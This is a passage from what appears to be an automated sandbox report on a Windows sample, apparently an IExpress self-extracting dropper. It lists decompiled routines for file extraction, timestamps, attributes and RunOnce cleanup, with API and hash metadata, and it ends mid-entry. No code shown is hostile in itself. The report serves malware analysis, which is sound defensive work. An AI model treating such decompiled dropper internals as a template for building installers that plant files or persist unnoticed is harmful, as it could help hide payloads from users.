                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                                • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                                • Opcode ID: 7733b42c6473c62e1d9d01885e3364714b84185f6d44261e468c1e83a298ff77
                                                                                                                                                                                                                                                • Instruction ID: 1ce2f4ce29d7da5af9bfdc5de8492972dae17aba32ac1f4c60195e9cca84d026
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7733b42c6473c62e1d9d01885e3364714b84185f6d44261e468c1e83a298ff77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFE04F31954318BBD7219B90EC0EF597B2DFB01740F500194FAC4A04E4EBF25A94D605
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00104CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				long _t35;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				struct HWND__* _t37;
                                                                                                                                                                                                                                                				long _t38;
                                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				long _t44;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				long _t46;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				long _t51;
                                                                                                                                                                                                                                                				char* _t58;
                                                                                                                                                                                                                                                				long _t59;
                                                                                                                                                                                                                                                				char* _t63;
                                                                                                                                                                                                                                                				long _t64;
                                                                                                                                                                                                                                                				CHAR* _t71;
                                                                                                                                                                                                                                                				CHAR* _t74;
                                                                                                                                                                                                                                                				int _t75;
                                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                                				_v8 = _t30;
                                                                                                                                                                                                                                                				_t75 = _a8;
                                                                                                                                                                                                                                                				if( *0x1091d8 == 0) {
                                                                                                                                                                                                                                                					_t32 = _a4;
                                                                                                                                                                                                                                                					__eflags = _t32;
                                                                                                                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                                                                                                                						_t33 = E00104E99(_t75);
                                                                                                                                                                                                                                                						L35:
                                                                                                                                                                                                                                                						return E00106CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x108584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x1091e4;
						_t58 = 0x1091e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x1091e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x1091e4;
						_t30 = E00104702( &_v268, 0x1091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0010476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00104980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E001047E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x1093f4 =  *0x1093f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x1091e4;
						_t63 = 0x1091e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x1091e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x1091e4;
						_t30 = E00104702( &_v268, 0x1091e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00104C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00104B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00104B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}
                                                                                                                                                                                                                                                0x00104d2a
                                                                                                                                                                                                                                                0x00104d2a
                                                                                                                                                                                                                                                0x00104d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104d2d
                                                                                                                                                                                                                                                0x00104cf8
                                                                                                                                                                                                                                                0x00104cfd
                                                                                                                                                                                                                                                0x00104d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00104DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00104DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-3290032183
                                                                                                                                                                                                                                                • Opcode ID: 966a6e46c79190184c71c2d545695713389e44784a764aa33aba7531f3b0ced9
                                                                                                                                                                                                                                                • Instruction ID: fe3d37740bcdcac56faa0d9d4563018623c09fc4329b53c415ed2e645b699893
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 966a6e46c79190184c71c2d545695713389e44784a764aa33aba7531f3b0ced9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F4164B62002018BCB24AFB8CDD46F573A5EB65340F048668EAC6976C1DBF1DE8AC750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00104C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                                				struct _FILETIME _v12;
                                                                                                                                                                                                                                                				struct _FILETIME _v20;
                                                                                                                                                                                                                                                				FILETIME* _t14;
                                                                                                                                                                                                                                                				int _t15;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(_t21 + 0x108d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t14 =  &_v12;
                                                                                                                                                                                                                                                					_t15 = SetFileTime( *(_t21 + 0x108d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                                					if(_t15 == 0) {
                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}









                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32 ref: 00104C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00104C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00104C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: a88e5b59d042b1af540e3a857a4704c1830b13c797600b11b48a32dfbb0a2f42
                                                                                                                                                                                                                                                • Instruction ID: c03a08f227622aeccc752ca3a74a9bb9ef43a5fe429f9841a233440998fac607
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a88e5b59d042b1af540e3a857a4704c1830b13c797600b11b48a32dfbb0a2f42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F096B260120C6FFB14DFB4CD88DBB77ACEB04250744452EB696C10D0EBB0D954C7A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E0010487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                				CHAR* _t11;
                                                                                                                                                                                                                                                				long _t18;
                                                                                                                                                                                                                                                				long _t23;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t11 = __ecx;
                                                                                                                                                                                                                                                				asm("sbb edi, edi");
                                                                                                                                                                                                                                                				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                                				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                                					asm("sbb esi, esi");
                                                                                                                                                                                                                                                					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                                						asm("sbb esi, esi");
                                                                                                                                                                                                                                                						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t23 = 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                                				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                                					return _t7;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E0010490C(_t11);
                                                                                                                                                                                                                                                					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}








                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00104A23,?,00104F67,*MEMCAB,00008000,00000180), ref: 001048DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00104F67,*MEMCAB,00008000,00000180), ref: 00104902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: f10e99827f12bef0c60374fd2cf9a463a5484bacef7e0f55c8e689853fa378db
                                                                                                                                                                                                                                                • Instruction ID: e5db84e7165311f14a038c413f5bacabedff00986deebcfdbd8269cd5916e8fa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f10e99827f12bef0c60374fd2cf9a463a5484bacef7e0f55c8e689853fa378db
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 200124F3E126702AF22450698C88FB7551C8B9A634F1B4735BEEAA62D2D6A44C0482E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E00104AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				int _t12;
                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                				signed int _t15;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				struct HWND__* _t21;
                                                                                                                                                                                                                                                				signed int _t24;
                                                                                                                                                                                                                                                				signed int _t25;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 =  *0x10858c; // 0x270
                                                                                                                                                                                                                                                				_t9 = E00103680(_t20);
                                                                                                                                                                                                                                                				if( *0x1091d8 == 0) {
                                                                                                                                                                                                                                                					_push(_t24);
                                                                                                                                                                                                                                                					_t12 = WriteFile( *(0x108d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						_t25 = _a12;
                                                                                                                                                                                                                                                						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                                							_t14 =  *0x109400; // 0x81600
                                                                                                                                                                                                                                                							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                                							 *0x109400 = _t15;
                                                                                                                                                                                                                                                							if( *0x108184 != 0) {
                                                                                                                                                                                                                                                								_t21 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                								if(_t21 != 0) {
                                                                                                                                                                                                                                                									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x1093f8, 0);
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0010369F
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036B2
                                                                                                                                                                                                                                                  • Part of subcall function 00103680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00104B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 9c6bd55ecfaaafb8ee66ce5e2b1eb6b526238fd666670d42812c3c9990c21592
                                                                                                                                                                                                                                                • Instruction ID: 0a989d3eda51cabaf55f65ccb389764eac389d5b1b52c1d420e97754da977e2b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c6bd55ecfaaafb8ee66ce5e2b1eb6b526238fd666670d42812c3c9990c21592
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F101F171200205ABDB148F68DC55BA27759FB44725F048325FAF9AB5F1CBF0C891CB80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E0010658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                                				char* _t6;
                                                                                                                                                                                                                                                				char* _t8;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				char* _t16;
                                                                                                                                                                                                                                                				intOrPtr* _t17;
                                                                                                                                                                                                                                                				void* _t18;
                                                                                                                                                                                                                                                				char* _t19;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t16 = __ecx;
                                                                                                                                                                                                                                                				_t10 = __edx;
                                                                                                                                                                                                                                                				_t17 = __ecx;
                                                                                                                                                                                                                                                				_t1 = _t17 + 1; // 0x108b3f
                                                                                                                                                                                                                                                				_t12 = _t1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t4 =  *_t17;
                                                                                                                                                                                                                                                					_t17 = _t17 + 1;
                                                                                                                                                                                                                                                				} while (_t4 != 0);
                                                                                                                                                                                                                                                				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                                				_t2 = _t18 + 1; // 0x108b40
                                                                                                                                                                                                                                                				if(_t2 < __edx) {
                                                                                                                                                                                                                                                					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                                					if(_t19 > __ecx) {
                                                                                                                                                                                                                                                						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                                						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                                							 *_t19 = 0x5c;
                                                                                                                                                                                                                                                							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t6 = _a4;
                                                                                                                                                                                                                                                					 *_t19 = 0;
                                                                                                                                                                                                                                                					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                                						_t6 = _t6 + 1;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return E001016B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return 0x8007007a;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(00108B3E,00108B3F,00000001,00108B3E,-00000003,?,001060EC,00101140,?), ref: 001065BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 721013e10aeef22d636b882b2fb3dd5a98924b42c2323dffd5abd4c77aab8d44
                                                                                                                                                                                                                                                • Instruction ID: f8fdb499cb9090786018a1ab5e53cac7c2e0202d6e219ce176250cec7adbf97e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 721013e10aeef22d636b882b2fb3dd5a98924b42c2323dffd5abd4c77aab8d44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2F04C321042509FD335591D9C84B76BFDE9B963A0F29026EE8DAC3389CBE58D5683B0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0010621E() {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				signed int _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                                                                				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                					0x4f0 = 2;
                                                                                                                                                                                                                                                					_t9 = E0010597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E001044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                                                                					 *0x109124 = E00106285();
                                                                                                                                                                                                                                                					_t9 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                                                                			}












APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0010623F
  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
Memory Dump Source
• Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
Similarity
• API ID: DirectoryErrorLastLoadMessageStringWindows
• String ID:
• API String ID: 381621628-0
• Opcode ID: 7c3e2d4f10b353a035b4f687bc4975b3303d68bf9881c9fae1ac2999d91a5276
• Instruction ID: a1047c0d12382c55c73d10a2797d316cfcad70df421bcfb9e04f9d4c7e392e1e
• Opcode Fuzzy Hash: 7c3e2d4f10b353a035b4f687bc4975b3303d68bf9881c9fae1ac2999d91a5276
• Instruction Fuzzy Hash: B5F089B07042086BE750EB749D06FBE77ACDB54700F400469BAC5D61D1DFF49D958654
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00104B60(signed int _a4) {
    signed int _t9;
    signed int _t15;

    _t15 = _a4 * 0x18;
    if( *((intOrPtr*)(_t15 + 0x108d64)) != 1) {
        _t9 = FindCloseChangeNotification( *(_t15 + 0x108d74)); // executed
        if(_t9 == 0) {
            return _t9 | 0xffffffff;
        }
        *((intOrPtr*)(_t15 + 0x108d60)) = 1;
        return 0;
    }
    *((intOrPtr*)(_t15 + 0x108d60)) = 1;
    *((intOrPtr*)(_t15 + 0x108d68)) = 0;
    *((intOrPtr*)(_t15 + 0x108d70)) = 0;
    *((intOrPtr*)(_t15 + 0x108d6c)) = 0;
    return 0;
}






APIs
• FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00104FA1,00000000), ref: 00104B98
Memory Dump Source
• Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
